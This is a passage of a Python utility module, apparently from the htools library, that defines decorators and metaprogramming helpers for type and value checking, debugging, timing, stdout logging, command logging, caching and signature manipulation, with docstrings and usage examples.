methods. If both methods should perform the same steps, one shortcut
is to implement a single undecorated __call__ method, then have the
debug-decorated on_begin and on_end methods return self(inputs, output).
"""
@abstractmethod
def setup(self, func):
"""
Parameters
----------
func: function
The function being decorated.
"""
@abstractmethod
def on_begin(self, func, inputs, output=None):
"""
Parameters
----------
func: function
The function being decorated.
inputs: dict
Dictionary of bound arguments passed to the function being
decorated with @callbacks.
output: any
Callbacks to be executed after the function call can pass the
function output to the callback. The default None value will remain
for callbacks that execute before the function.
"""
@abstractmethod
def on_end(self, func, inputs, output=None):
"""
Parameters
----------
func: function
The function being decorated.
inputs: dict
Dictionary of bound arguments passed to the function being
decorated with @callbacks.
output: any
Callbacks to be executed after the function call can pass the
function output to the callback. The default None value will remain
for callbacks that execute before the function.
"""
def __repr__(self):
return f'{type(self).__name__}()'
def callbacks(cbs):
"""Decorator that attaches callbacks to a function. Callbacks should be
defined as classes inheriting from abstract base class Callback that
implement on_begin and on_end methods. This allows us to store states
rather than just printing outputs or relying on global variables.
Parameters
----------
cbs: list
List of callbacks to execute before and after the decorated function.
Examples
--------
@callbacks([PrintHyperparameters(), PlotActivationHist(),
ActivationMeans(), PrintOutput()])
def train_one_epoch(**kwargs):
# Train model.
"""
def decorator(func):
for cb in cbs:
cb.setup(func)
@wraps(func)
def wrapper(*args, **kwargs):
bound = signature(func).bind_partial(*args, **kwargs)
bound.apply_defaults()
for cb in cbs:
cb.on_begin(func, bound.arguments, None)
out = func(*args, **kwargs)
for cb in cbs:
cb.on_end(func, bound.arguments, out)
return out
return wrapper
return decorator
def typecheck(func_=None, **types):
"""Decorator to enforce type checking for a function or method. There are
two ways to call this: either explicitly passing argument types to the
decorator, or letting it infer them using type annotations in the function
that will be decorated. We allow multiple both usage methods since older
versions of Python lack type annotations, and also because I feel the
annotation syntax can hurt readability.
Parameters
----------
func_: function
The function to decorate. When using decorator with
manually-specified types, this is None. Underscore is used so that
`func` can still be used as a valid keyword argument for the wrapped
function.
types: type
Optional way to specify variable types. Use standard types rather than
importing from the typing library, as subscripted generics are not
supported (e.g. typing.List[str] will not work; typing.List will but at
that point there is no benefit over the standard `list`).
Examples
--------
In the first example, we specify types directly in the decorator. Notice
that they can be single types or tuples of types. You can choose to
specify types for all arguments or just a subset.
@typecheck(x=float, y=(int, float), iters=int, verbose=bool)
def process(x, y, z, iters=5, verbose=True):
print(f'z = {z}')
for i in range(iters):
if verbose: print(f'Iteration {i}...')
x *= y
return x
>>> process(3.1, 4.5, 0, 2.0)
TypeError: iters must be <class 'int'>, not <class 'float'>.
>>> process(3.1, 4, 'a', 1, False)
z = a
12.4
Alternatively, you can let the decorator infer types using annotations
in the function that is to be decorated. The example below behaves
equivalently to the explicit example shown above. Note that annotations
regarding the returned value are ignored.
@typecheck
def process(x:float, y:(int, float), z, iters:int=5, verbose:bool=True):
print(f'z = {z}')
for i in range(iters):
if verbose: print(f'Iteration {i}...')
x *= y
return x
>>> process(3.1, 4.5, 0, 2.0)
TypeError: iters must be <class 'int'>, not <class 'float'>.
>>> process(3.1, 4, 'a', 1, False)
z = a
12.4
"""
# Case 1: Pass keyword args to decorator specifying types.
if not func_:
return partial(typecheck, **types)
# Case 2: Infer types from annotations. Skip if Case 1 already occurred.
elif not types:
types = {k: v.annotation
for k, v in signature(func_).parameters.items()
if not v.annotation == inspect._empty}
@wraps(func_)
def wrapper(*args, **kwargs):
fargs = signature(wrapper).bind(*args, **kwargs).arguments
for k, v in types.items():
if k in fargs and not isinstance(fargs[k], v):
raise TypeError(
f'{k} must be {str(v)}, not {type(fargs[k])}.'
)
return func_(*args, **kwargs)
return wrapper
def valuecheck(func):
"""Decorator that checks if user-specified arguments are acceptable.
Because this re-purposes annotations to specify values rather than types,
this can NOT be used together with the @typecheck decorator. Keep in mind
that this tests for equality, so 4 and 4.0 are considered equivalent.
Parameters
----------
func: function
The function to decorate. Use annotations to specify acceptable values
as tuples, as shown below.
Examples
--------
@valuecheck
def foo(a, b:('min', 'max'), c=6, d:(True, False)=True):
return d, c, b, a
>>> foo(3, 'min')
(True, 6, 'min', 3)
>>> foo(True, 'max', d=None)
ValueError: Invalid argument for parameter d. Value must be in
(True, False).
>>> foo('a', 'mean')
ValueError: Invalid argument for parameter b. Value must be in
('min', 'max').
"""
@wraps(func)
def wrapper(*args, **kwargs):
sig = signature(func)
annos = {k: v.annotation for k, v in sig.parameters.items()}
bound = sig.bind(*args, **kwargs)
bound.apply_defaults()
for k, v in bound.arguments.items():
choices = annos[k]
if choices == inspect._empty: continue
if v not in choices:
raise ValueError(f'Invalid argument for parameter {k}. '
f'Value must be in {choices}.')
return func(*args, **kwargs)
return wrapper
def deprecated(func=None, *, msg=''):
"""Decorator to mark a function as deprecated. This serves as both
documentation (seeing it in the code is a good reminder) and also provides
a warning if/when the function is called.
Parameters
----------
func: FunctionType
Passed in to the decorator automatically.
msg: str (optional)
You may specify a more specific warning message to display when the
function is called. This MUST be passed in as a keyword argument,
not positional. If you don't mind using the default, use the
no-parentheses form of the decorator.
Examples
--------
@deprecated
def my_old_func():
# ...
@deprecated(msg='My custom message!')
def my_old_func():
# ...
"""
if func:
assert callable(func), \
'`deprecated` received a non-callable argument instead of a '\
'function. If you meant to pass in msg, it must be a keyword arg.'
else:
return partial(deprecated, msg=msg)
@wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(
msg or f'Soft deprecation: {func_name(func)} should not be used '
f'anymore.')
return func(*args, **kwargs)
return wrapper
def debug(func=None, prefix='', arguments=True, out_path=None):
"""Decorator that prints information about a function call. Often, this
will only be used temporarily when debugging. Note that a wrapped function
that accepts *args will display a signature including an 'args' parameter
even though it isn't a named parameter, because the goal here is to
explicitly show which values are being passed to which parameters. This
does mean that the printed string won't be executable code in this case,
but that shouldn't be necessary anyway since it would contain the same call
that just occurred.
The decorator can be used with or without arguments.
Parameters
----------
func: function
Function being decorated.
prefix: str
A short string to prepend the printed message with. Ex: '>>>'
arguments: bool
If True, the printed message will include the function arguments.
If False, it will print the function name but not its arguments.
out_path: str or Path or None
If provided, a dict of arguments will be saved as a json file as
specified by this path. Intermediate directories will be created if
necessary. Function arguments will be made available for string
formatting if you wish to use that in the file name.
Example: 'data/models/{prefix}/args.json'. The argument "prefix" will
be used to save the file in the appropriate place. Note: `arguments`
does not affect this since arguments are the only thing saved here.
Examples
--------
Occasionally, you might pass arguments to different parameters than you
intended. Throwing a debug_call decorator on the function helps you check
that the arguments are matching up as expected. For example, the parameter
names in the function below have an unexpected order, so you could easily
make the following call and expect to get 8. The debug decorator helps
catch that the third argument is being passed in as the x parameter.
@debug
def f(a, b, x=0, y=None, z=4, c=2):
return a + b + c
>>> f(3, 4, 1)
CALLING f(a=3, b=4, x=1, y=None, z=4, c=2)
9
@debug(prefix='***', arguments=False)
def f(a, b, x=0, y=None, z=4, c=2):
return a + b + c
>>> f(3, 4, 1)
*** CALLING f()
9
"""
if not func:
if prefix: prefix += ' '
if out_path:
assert str(out_path).endswith('.json'), \
'out_path must ends with .json'
return partial(debug, prefix=prefix, arguments=arguments,
out_path=out_path)
@wraps(func)
def wrapper(*args, **kwargs):
out_fmt = '\n{}CALLING {}({})'
arg_strs = ''
if arguments:
sig = bound_args(wrapper, args, kwargs, collapse_kwargs=True)
if sig:
first_key = next(iter(sig))
# Remove self/cls arg from methods. Just check first arg to be
# extra careful.
if first_key in ('self', 'cls'):
del sig[first_key]
arg_strs = (f'{k}={repr(v)}' for k, v in sig.items())
# Print call message and return output.
print(out_fmt.format(prefix, func.__qualname__, ', '.join(arg_strs)))
if out_path: save(dict(sig), str(out_path).format(**sig))
return func(*args, **kwargs)
return wrapper
def log_stdout(func=None, fname=''):
"""Decorator that logs all stdout produced by a function.
Parameters
----------
func: function
If the decorator is used without parenthesis, the function will be
passed in as the first argument. You never need to explicitly specify
a function.
fname: str
Path to log file which will be created. If None is specified, the
default is to write to ./logs/wrapped_func_name.log. If specified,
this must be a keyword argument.
Examples
--------
@log_stdout
def foo(a, b=3):
print(a)
a *= b
print(a)
return a**b
@log_stdout(fname='../data/mylog.log')
def foo(a, b=3):
...
"""
if not func:
return partial(log_stdout, fname=Path(fname))
if not fname:
fname = Path(f'./logs/{func.__name__}.log')
@wraps(func)
def wrapper(*args, **kwargs):
os.makedirs(fname.parent, exist_ok=True)
with open(fname, 'w') as f:
with redirect_stdout(f):
out = func(*args, **kwargs)
return out
return wrapper
def return_stdout(func):
"""Decorator that returns printed output from the wrapped function. This
may be useful if we define a function that only prints information and
returns nothing, then later decide we want to access the printed output.
Rather than re-writing everything, we can slap a @return_stdout decorator
on top and leave it as is. This should not be used if the decorated
function already returns something else since we will only return what is
printed to stdout. For that use case, consider the `log_stdout` function.
"""
@wraps(func)
def wrapper(*args, **kwargs):
res = io.StringIO()
with redirect_stdout(res):
func(*args, **kwargs)
return res.getvalue()
return wrapper
def log_cmd(path, mode='w', defaults=False):
"""Decorator that saves the calling command for a python script. This is
often useful for CLIs that train ML models. It makes it easy to re-run
the script at a later date with the same or similar arguments. If importing
a wrapped function (or class with a wrapped method), you must include
`os.environ['LOG_CMD'] = 'true'`
in your script if you want logging to occur (accidentally overwriting log
files unintentionally can be disastrous). Values 'True' and '1' also work
but True and 1 do not (os.environ requires strings). Note that these values
will not persist once the script completes.
Parameters
----------
path: str or Path
Specifies file where output will be saved.
mode: str
Determines whether output should overwrite old file or be appended.
One of ('a', 'w'). In most cases we will want append mode because we're
tracking multiple trials.
defaults: bool
If True, include all arg values, even those that weren't specified
from the command line (e.g. if your CLI function accepts up to 10 args
(some with default values) and you pass in 3, the command will be
logged as if you explicitly passed in all 10. This can be useful if
you think your default args might change over time). If False, only
args that were explicitly mentioned in your command will be used.
Examples
--------
```
# train.py
import fire
@log_cmd('logs/training_runs.txt')
def train(lr, epochs, dropout, arch, data_version, layer_dims):
# Train model
if __name__ == '__main__':
fire.Fire(train)
```
$ python train.py --lr 3e-3 --epochs 50 --dropout 0.5 --arch awd_lstm \
--data_version 1 --layer_dims '[64, 128, 256]' \
--dl_kwargs '{"shuffle": False, "drop_last": True}'
After running the script with the above command, the file
'logs/training_runs.txt' now contains a nicely formatted version of the
calling command with a separate line for each argument name/value pair.
We can also use variables that are passed to our function. All function
args and kwargs will be passed to the string formatter so your variable
names must match:
@log_cmd('logs/train_run_v{version_number}.{ext}')
def train(version_number, ext, epochs, arch='lstm'):
# Train model
"""
def decorator(func):
@wraps(func)
def wrapped(*args, **kwargs):
# Don't call when another function imports the wrapped function
# unless we specifically ask it to by setting LOG_CMD = 'true' in
# our CLI script. This is necessary because we sometimes want a
# script to call another script and without this check, the new
# command would always overwrite the old one which isn't always
# what we want.
if func.__module__ != '__main__' and not \
os.environ.get('LOG_CMD', '').lower() in ('true', '1'):
return func(*args, **kwargs)
# Log command before running script. Don't want to risk some
# obscure bug occurring at the end and ruining a long process.
fn_locals = bound_args(func, args, kwargs, True)
start_of_line = ' \\\n\t'
res = 'python'
if defaults:
res += __file__
for k, v in fn_locals.items():
# Enclose data structure args in single quotes and use
# double quotes inside if necessary.
if isinstance(v, (tuple, list, dict, set)):
v = "'" + str(v).replace("'", '"') + "'"
res += f'{start_of_line}--{k} {v}'
else:
for arg in sys.argv:
res += start_of_line if arg.startswith('-') else ' '
# Ensure non-primitive kwargs are quoted appropriately.
for start, end in ['[]', '()', '{}']:
if arg.startswith(start) and arg.endswith(end):
arg = f"'{arg}'"
res += arg
save(res+'\n\n', Path(path.format(**fn_locals)), mode)
return func(*args, **kwargs)
return wrapped
return decorator
def wrapmethods(*decorators, methods=(), internals=False):
"""Class wrapper that applies 1 or more decorators to every non-magic
method (properties are also excluded). For example, we often want @debug
to be applied to many different methods.
Parameters
----------
decorators: callable
1 or more decorators to apply to methods within a class. By default,
methods with 1 or 2 leading underscores are excluded.
methods: Iterable[str]
Names of methods to wrap if you don't want to wrap all of them.
Internal methods can be wrapped but magic methods and properties
cannot.
internals: bool
If True, apply decorators to methods named with leading single
underscores. This will be ignored if `methods` is specified.
"""
def wrapper(cls):
special_methods = (staticmethod, classmethod)
if methods:
to_wrap = dict.fromkeys(methods, True)
else:
to_wrap = {k: v == 'method' for k, v in
hdir(cls, False, internals=internals).items()}
for attr, is_method in to_wrap.items():
f = cls.__dict__[attr]
if not is_method or isinstance(f, property):
continue
# Classmethod and staticmethod decorators need to be applied last.
final_wrapper = identity
if isinstance(f, special_methods):
final_wrapper = type(f)
f = f.__func__
for d in decorators:
f = d(f)
setattr(cls, attr, final_wrapper(f))
return cls
return wrapper
def add_docstring(func):
"""Add the docstring from another function/class to the decorated
function/class.
Examples
--------
@add_docstring(nn.Conv2d)
class ReflectionPaddedConv2d(nn.Module):
...
"""
def decorator(new_func):
new_func.__doc__ = f'{new_func.__doc__}\n\n{func.__doc__}'
@wraps(new_func)
def wrapper(*args, **kwargs):
return new_func(*args, **kwargs)
return wrapper
return decorator
def timer(func):
"""Provide conservative time estimate for a function to run. Behavior may
not be interpretable for recursive functions.
Parameters
-----------
func: function
The function to time.
Examples
---------
import time
@timer
def count_to(x):
for i in range(x):
time.sleep(0.5)
>>> count_to(10)
[TIMER]: count_to executed in approximately 5.0365 seconds.
"""
@wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter()
output = func(*args, **kwargs)
duration = time.perf_counter() - start
print(f'\n[TIMER]: {func.__name__} executed in approximately '
f'{duration:.3f} seconds.\n')
return output
return wrapper
def handle(func=None, default=None):
"""Decorator that provides basic error handling. This is a rare decorator
that is often most useful without the syntactic sugar: for instance,
we may have a pre-existing function and want to apply it to a pandas Series
while handling errors. See `Examples`.
Parameters
----------
func: callable
The function to decorate.
default: any
This is the value that will be returned when the wrapped function
throws an error.
Examples
--------
There are a few different ways to use this function:
@handle
def func():
# Do something
@handle(default=0)
def func():
# Do something
def some_func(x):
# Do something
df.name.apply(handle(some_func))
"""
if not func: return partial(handle, default=default)
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception:
return default
return wrapper
@contextmanager
def block_timer(name=''):
"""Context manager to time a block of code. This works similarly to @timer
but can be used on code outside of functions.
Examples
--------
with block_timer() as bt:
# Code inside the context manager will be timed.
arr = [str(i) for i in range(25_000_000)]
first = None
while first != '100':
arr.pop(0)
print(bt['duration'])
1.25 # Float measuring time spent in context manager.
"""
data = {}
if name: name = repr(name) + ' '
start = time.perf_counter()
try:
yield data
finally:
duration = time.perf_counter() - start
print(f'[TIMER]: Block {name}executed in {duration:.3f} seconds.')
data['duration'] = duration
def count_calls(func):
"""Count the number of times a function has been called. The function can
access this value inside itself through the attribute 'calls'. Note that
counting is defined such that during the first call, func.calls already=1
(i.e. it can be considered the n'th call, not that n calls have previously
taken place not counting the current one).
"""
@wraps(func)
def wrapper(*args, **kwargs):
calls = getattr(wrapper, 'calls', 0)
wrapper.calls = calls + 1
return func(*args, **kwargs)
return wrapper
def min_wait(seconds):
"""Decorator that skips executing the decorated function if it was executed
very recently (within a user-specified wait period).
The resulting function's `last_called` attribute stores the value of
perf_counter when it was last executed.
Parameters
----------
seconds: int or float
Minimum wait period. If you try to execute the function < `wait`
seconds after its last execution, it will return None.
"""
if seconds >= 60 or seconds < 1:
warnings.warn('min_wait is intended to be used with wait periods of a '
'few seconds. Wait periods under a second or over a '
'minute are not recommended - they may work but I '
'don\'t know.')
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
last_called = getattr(wrapper, 'last_called', float('-inf'))
wrapper.last_called = time.perf_counter()
if wrapper.last_called - last_called < seconds:
print(f'Not calling: function was called less than {seconds} '
'seconds ago.')
return
return func(*args, **kwargs)
return wrapper
return decorator
def mutable_cache(**preproc_funcs):
"""Cache function outputs like functools.lru_cache but allow mutable
inputs. You can specify preprocessing functions for earch arg (or a subset
of them) which will be called on the input before they are hashed.
Parameters
----------
preproc_funcs: function
Optionally specify one or more functions (up to one per arg) to apply
to the decorated function's arguments before attempting to hash them.
For example, a list argument could be cast to a tuple before hashing.
See Examples. (Note: args that do not receive a preprocesisng func
will simply be hashed directly. They WILL still be part of the
conditions for identifying if we have a cached result.)
Examples
--------
@mutable_cache(seq=tuple, T=id)
def seq_probs(seq, T):
# Do something
"""
cache = {}
def decorator(func):
for name in set(params(func)) - set(preproc_funcs):
preproc_funcs[name] = identity
@wraps(func)
def wrapper(*args, **kwargs):
bound = bound_args(func, args, kwargs)
preprocessed = {name: hash(func(bound[name]))
for name, func in preproc_funcs.items()}
key = tuple(preprocessed.items())
if key not in cache:
cache[key] = func(*args, **kwargs)
return cache[key]
return wrapper
return decorator
def copy_func(func):
"""Copy a function. Regular copy and deepcopy functionality do not work
on functions the way they do on most objects. If we want to create a new
function based on another without altering the old one (as in
`rename_params`), this should be used.
Parameters
----------
func: function
Function to duplicate.
Returns
-------
function: Copy of input `func`.
Examples
--------
def foo(a, b=3, *args, c=5, **kwargs):
return a, b, c, args, kwargs
foo2 = copy_func(foo)
>>> foo2.__code__ == foo.__code__
True
>>> foo2 == foo
False
"""
new_func = types.FunctionType(func.__code__, func.__globals__,
func.__name__, func.__defaults__,
func.__closure__)
defaults = getattr(func, '__kwdefaults__') or {}
new_func.__kwdefaults__ = defaults.copy()
return update_wrapper(new_func, func)
def rename_params(func, **old2new):
"""Rename one or more parameters. Docstrings and default arguments are
updated accordingly. This is useful when working with code that uses
`hasarg`. For example, my Incendio library uses parameter names
to pass the correct arguments to different metrics.
# TODO: looks like this updates the signature but doesn't actually change
the variable names. So you can't call the decorated function with the
new argument names.
Parameters
----------
func: function
The old function to change.
old2new: str
One or more parameter names to change and their corresponding new
names. See Example below for a more concrete example.
Returns
-------
function: Same as input `func` but with updated parameter names.
Examples
--------
def foo(a, b, *args, c=3, **kwargs):
pass
foo_metric = rename_params(func, a=y_true, b=y_pred)
`foo_metric` will work exactly like `foo` but its first two parameters will
now be named "y_true" and "y_pred", respectively. """
new_func = copy_func(func)
sig = signature(new_func)
kw_defaults = func.__kwdefaults__ or {}
names, params = map(list, zip(*sig.parameters.items()))
for old, new in old2new.items():
idx = names.index(old)
default = kw_defaults.get(old) or params[idx].default
params[idx] = inspect.Parameter(new, params[idx].kind, default=default)
new_func.__signature__ = sig.replace(parameters=params)
return new_func
def immutify_defaults(func):
"""Decorator to make a function's defaults arguments effectively immutable.
We accomplish this by storing the initially provided defaults and assigning
them back to the function's signature after each call. If you use a
variable as a default argument, this does not mean that the variable's
value will remain unchanged - it just ensures the initially provided value
will be used for each call.
"""
# If `__hash__` is not None, object is immutable already.
# Python sets __defaults__ and __kwdefaults__ to None when they're empty.
_defaults = tuple(o if getattr(o, '__hash__') else deepcopy(o)
for o in getattr(func, '__defaults__') or ()) or None
_kwdefaults = {k: v if getattr(v, '__hash__') else deepcopy(v) for k, v
in (getattr(func, '__kwdefaults__') or {}).items()} or None
@wraps(func)
def wrapper(*args, **kwargs):
res = func(*args, **kwargs)
wrapper.__defaults__ = func.__defaults__ = deepcopy(_defaults)
wrapper.__kwdefaults__ = func.__kwdefaults__ = deepcopy(_kwdefaults)
return res
return wrapper
@contextmanager
def temporary_globals(func, **kwargs):
"""Make a dict of key-value pairs temporarily available to a function in
its global vars. We have to use function globals rather than globals()
because the latter is evaluated when importing this function and so takes
on the globals of htools/meta.py rather than of the scope where the
code will ultimately be executed. Used in `add_kwargs` and `fallback`
decorators (i.e. mostly for toy functionality, risky to actually use this).
"""
old_globals = func.__globals__.copy()
func.__globals__.update(kwargs)
try:
yield
finally:
for k in kwargs:
if k in old_globals:
func.__globals__[k] = old_globals[k]
else:
del func.__globals__[k]
def defined_functions(exclude=(), include_imported=False,
include_ipy_like=False):
"""Get all available functions defined in the current module.
Parameters
----------
exclude: Iterable[str]
Names of any functions to exclude from results.
include_imported: bool
If True, include imported functions (this can be a LOT of functions if
we've used star imports, as recommended for certain libraries like
htools and fastai). If False, only return functions defined in the
current module.
include_ipy_like: bool
Specifies whether to include functions whose names are like "_243"
which is how IPython seems to store previously called functions
(or something like that).
Returns
-------
dict[str, FunctionType]: Dict mapping function name to function.
"""
res = {}
exclude = set(tolist(exclude))
modules = vars(sys.modules['__main__']).copy()
for k, v in modules.items():
# IPython also sometimes has vars consisting only of underscores and
# those become empty strings after the strip, which evaluate to not
# numeric unless we add a digit.
if isinstance(v, types.FunctionType) and \
(include_imported or v.__module__ == '__main__') and \
(include_ipy_like or not (k.strip('_')+'1').isnumeric()) and \
k not in exclude:
res[k] = v
return res
def decorate_functions(decorator, exclude=(), include_imported=False,
include_ipy_like=False):
"""Decorate all (or some large subset, depending on args) functions
available in the current module's global scope. Can be useful for
debugging (see examples).
Parameters
----------
exclude: Iterable[str]
Names of any functions to exclude from results.
decorator: FunctionType
The function that will be used to decorate all available functions.
This must accept only a function as an argument, so make sure to pass
in the appropriate object (for instance, if you want to use the
htools.meta.timeboxed decorator, you must call it first with the
desired arguments (e.g. time).
include_imported: bool
If True, include imported functions (this can be a LOT of functions if
we've used star imports, as recommended for certain libraries like
htools and fastai). If False, only return functions defined in the
current module.
include_ipy_like: bool
Specifies whether to include functions whose names are like "_243"
which is how IPython seems to store previously called functions
(or something like that).
Examples
--------
def foo(a):
# Do something
def bar(x, y):
# Do something else
if __name__ == '__main__':
decorate_functions(debug)
foo(3)
bar(4, 5)
"""
for k, v in defined_functions(exclude, include_imported,
include_ipy_like).items():
setattr(sys.modules['__main__'], k, decorator(v))
def register_functions(prefix):
"""Construct a dict of certain functions defined in a module. This lets
scripts that import the module access these functions dynamically using a
dict rather than using getattr messiness, importlib (which makes imports
invisible to htools requirements.txt builder), or eval usage. See Examples.
Parameters
----------
prefix
Returns
-------
dict[str, function]
Examples
--------
# modeling.py
def fit_knn(x, y, **kwargs):
return knn(**kwargs).fit(x, y)
def fit_nn(x, y, **kwargs):
module = Network(**kwargs)
module.train(x, y)
return module
def helper_function(z):
return z
FIT_FUNCS = register_functions(prefix='fit_')
# train.py
import fire
from modeling import FIT_FUNCS
def train(model):
x, y = load_xy()
FIT_FUNCS[model](x, y)
if __name__ == '__main__':
fire.Fire(train)
"""
return {k.split(prefix)[-1]: v for k, v in defined_functions().items()
if k.startswith(prefix)}
def source_code(name, lib_name='htools'):
"""Find the snippet of source code for a class/function defined in some
library (usually htools). Like `inspect.getsource` except you just pass it
strings and it handles all the imports.
Warning: this was initially intended solely for use on htools-defined
functionality, and it wasn't til afterwards that I realized it might extend
reasonably well to other libraries. Known limitations: built in libraries
(e.g. os) and big libraries with nested file structures (e.g. fastai)
generally won't work.
Parameters
----------
name: str
Class or function (usually defined in htools) that you want to see
source code for.
lib_name: str
Name of library to check in, usually 'htools'.
Returns
-------
tuple[str]: First item is the htools source code of the function/class
(if not found, this is empty). Second item is a string that is either empty
(if the function/class was found) or the name of a class/function most
similar to the user-specified `name` if not.
"""
if lib_name not in locals():
lib = importlib.import_module(lib_name)
else:
lib = sys.modules[lib_name]
# As of version 6.3.1, htools __init__ imports most modules so we can often
# find the desired object as an attribute of the module itself. But we
# might change that behavior in the future so the pkutil method is a good
# fallback (and even now, it's needed for pd_tools methods).
names = set()
no_match = ''
for mod, mod_name, _ in pkgutil.iter_modules(lib.__path__):
try:
module = getattr(lib, mod_name)
src = getsource(getattr(module, name))
return src, no_match
except AttributeError as e:
with open(lib.__path__[0] + f'/{mod_name}.py', 'r') as f:
tree = ast.parse(f.read())
names.update(x.name for x in tree.body
if isinstance(x, (ast.ClassDef, ast.FunctionDef)))
backup = ''
if names:
backup = process.extract(name, names, limit=1, scorer=fuzz.ratio)[0][0]
return no_match, backup
def fallback(meth=None, *, keep=(), drop=(), save=False):
"""Make instance/class attributes available as default arguments for a
method. Kwargs can be passed in to override one or more of them. You can
also choose for kwargs to update the instance attributes if desired.
When using default values for keep/drop/save, the decorator can be used
without parentheses. If you want to change one or more arguments, they
must be passed in as keyword args (meth is never explicitly passed in, of
course).
Parameters
----------
meth: method
The method to decorate. Unlike the other arguments, this is passed in
implicitly.
keep: Iterable[str] or str
Name(s) of instance attributes to include. If you specify a value
here, ONLY these instance attributes will be made available as
fallbacks. If you don't pass in any value, the default is for all
instance attributes to be made available. You can specify `keep`,
`drop`, or neither, but not both. This covers all possible options:
keep only a few, keep all BUT a few, or keep all (drop all is the
default case and doesn't require a decorator).
drop: Iterable[str] or str
Name(s) of instance attributes to ignore. I.e. if you want to make
all instance attributes available as fallbacks except for self.df,
you could specify drop=('df').
save: bool
If True, kwargs that share names with instance attributes will be
overwritten with their new values. E.g. if we previously had
self.lr = 3e-3 and you call your decorated method with
obj.mymethod(lr=1), self.lr will be set to 1.
Examples
--------
# Ex 1. self.a, self.b, and self.c are all available as defaults
class Tree:
def __init__(self, a, b, c=3):
self.a = a
self.b = b
self.c = c
@fallback
def call(self, **kwargs):
return a, b, c
# Ex 2. self.b is not available as a default. We must put b in `call`'s
# signature or the variable won't be accessible.
class Tree:
def __init__(self, a, b, c=3):
self.a = a
self.b = b
self.c = c
@fallback(drop=('b'))
def call(self, b, **kwargs):
return a, b, c
# Ex 3. Self.b and self.c are available as defaults. If b or c are
# specified in kwargs, the corresponding instance attribute will be updated
# to take on the new value.
class Tree:
def __init__(self, a, b, c=3):
self.a = a
self.b = b
self.c = c
@fallback(keep=['b', 'c'], save=True)
def call(self, a, **kwargs):
return a, b, c
"""
if meth is None:
# Want to avoid errors if user passes in string or leaves comma out of
# tuple when specifying keep/drop.
return partial(fallback, keep=tolist(keep), drop=tolist(drop),
save=save)
@wraps(meth)
def wrapper(*args, **kwargs):
self = args[0]
self_kwargs = vars(self)
if keep or drop: self_kwargs = select(self_kwargs, keep, drop)
# Update kwargs with instance attribute defaults. Also update self if
# user asked to save kwargs.
for k, v in self_kwargs.items():
if k not in kwargs:
kwargs[k] = v
elif save:
setattr(self, k, kwargs[k])
# Execute and return.
with temporary_globals(meth, **kwargs):
return meth(*args, **kwargs)
return wrapper
def add_kwargs(*fns, required=True, variable=True):
"""When one or more functions are called inside another function, we often
have the choice of accepting **kwargs in our outer function (downside:
user can't see parameter names with quick documentation tools) or
explicitly typing out each parameter name and default (downsides: time
consuming and error prone since it's easy to update the inner function and
forget to update the outer one). This lets us update the outer function's
signature automatically based on the inner function(s)'s signature(s).
The Examples section should make this more clear.
The wrapped function must accept **kwargs, but you shouldn't refer to
`kwargs` explicitly inside the function. Its variables will be made
available essentially as global variables. This shares a related goal with
fastai's `delegates` decorator but it provides a slightly different
solution: `delegates` updates the quick documentation but the variables
are still ultimately only available as kwargs. Here, they are available
like regular variables.
Note: don't actually use this for anything important, I imagine it could
lead to some pretty nasty bugs. I was just determined to get something
working.
Parameters
----------
fns: functions
The inner functions whose signatures you wish to use to update the
signature of the decorated outer function. When multiple functions
contain a parameter with the same name, priority is determined by the
order of `fns` (earlier means higher priority).
required: bool
If True, include required arguments from inner functions (that is,
positional arguments or positional_or_keyword arguments with no
default value). If False, exclude these (it may be preferable to
explicitly include them in the wrapped function's signature).
variable: bool
If True, include *kwargs and **kwargs from the inner functions. They
will be made available as {inner_function_name}_args and
{inner_function_name}_kwargs, respectively (see Examples). Otherwise,
they will be excluded.
Examples
--------
def foo(x, c, *args, a=3, e=(11, 9), b=True, f=('a', 'b', 'c'), **kwargs):
print('in foo')
return x * c
def baz(n, z='z', x='xbaz', c='cbaz'):
print('in baz')
return n + z + x + c
baz comes before foo so its x param takes priority and has a default
value of 'xbaz'. The decorated function always retains first priority so
the c param remains positional despite its appearance as a positional
arg in foo.
@add_kwargs(baz, foo, positional=True)
def bar(c, d=16, **kwargs):
foo_res = foo(x, c, *foo_args, a=a, e=e, b=b, f=f, **foo_kwargs)
baz_res = baz(n, z, x, c)
return {'c': c, 'n': n, 'd': d, 'x': x, 'z': z, 'a': a,
'e': e, 'b': b, 'f': f}
bar ends up with the following signature:
<Signature (c, n, d=16, x='xtri', foo_args=(), z='z', *, a=3, e=(11, 9),
b=True, f=('a', 'b', 'c'), foo_kwargs={}, **kwargs)>
Notice many variables are available inside the function even though they
aren't explicitly hard-coded into our function definition. When using
shift-tab in Jupyter or other quick doc tools, they will all be visible.
You can see how passing in multiple functions can quickly get messy so
if you insist on using this, try to keep it to 1-2 functions if possible.
"""
param_types = {Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY}
if required: param_types.add(Parameter.POSITIONAL_ONLY)
def _args(fn):
res = {}
for k, v in params(fn).items():
# If required=False, allow positional_or_keyword args with
# defaults but not those without.
if v.kind in param_types and (required
or v.default != inspect._empty):
res[k] = v
# args/kwargs are converted to non-varying types and names are
# adjusted to include function name. E.g. if we're adding kwargs
# from function foo which accepts kwargs, that arg becomes a
# keyword-only dictionary called foo_kwargs.
elif variable:
name = f'{fn.__name__}_{k}'
if v.kind == Parameter.VAR_POSITIONAL:
kind = Parameter.POSITIONAL_OR_KEYWORD
default = ()
elif v.kind == Parameter.VAR_KEYWORD:
kind = Parameter.KEYWORD_ONLY
default = {}
else:
continue
res[name] = Parameter(name, kind, default=default)
return res
# ChainMap operates in reverse order so functions that appear earlier in
# `fns` take priority.
extras_ = dict(ChainMap(*map(_args, fns)))
def decorator(func):
"""First get params present in func's original signature, then get
params from additional functions which are NOT present in original
signature. Combine and sort param lists so positional args come first
etc. Finally replace func's signature with our newly constructed one.
"""
sig = signature(func)
extras = [v for v in
select(extras_, drop=sig.parameters.keys()).values()]
parameters = sorted(
list(sig.parameters.values()) + extras,
key=lambda x: (x.kind, x.default != inspect._empty)
)
func.__signature__ = sig.replace(parameters=parameters)
@wraps(func)
def wrapper(*args, **kwargs):
"""Execute wrapped function in a context where kwargs are
temporarily available as globals. Globals will be restored to
its prior state once execution completes.
"""
# Order matters here: defaults must come first so user-passed
# args/kwargs will override them.
kwargs = {**{p.name: p.default for p in extras},
**func.__signature__.bind(*args, **kwargs).arguments}
